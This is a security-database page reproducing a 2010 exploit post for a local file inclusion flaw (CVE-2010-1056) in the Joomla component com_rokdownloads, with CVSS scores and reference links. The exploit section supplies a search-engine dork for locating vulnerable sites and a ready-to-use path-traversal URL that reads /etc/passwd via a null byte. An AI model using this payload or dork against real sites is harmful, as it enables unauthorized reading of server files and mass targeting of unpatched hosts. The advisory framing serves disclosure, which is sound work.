Joomla Component com_rokdownloads Local File Inclusion Vulnerability

2010.03.25
Credit: AtT4CKxT3rR0r1ST
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-1056
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Joomla Component com_rokdownloads Local File Inclusion ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : Joomla Component com_rokdownloads .:. Bug Type : Local File Inclusion [LFI] .:. Dork : inurl:"com_rokdownloads" #################################################################### ===[ Exploit ]=== www.site.com/index.php?option=com_rokdownloads&controller=[LFI] www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 #################################################################### ________________________________ Hotmail: Trusted email with Microsoft?s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>

References:

http://www.securityfocus.com/bid/38741
http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released
http://xforce.iss.net/xforce/xfdb/56898
http://www.exploit-db.com/exploits/11760
http://secunia.com/advisories/38982
http://packetstormsecurity.org/1003-exploits/joomlarokdownloads-lfi.txt
http://osvdb.org/62972


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top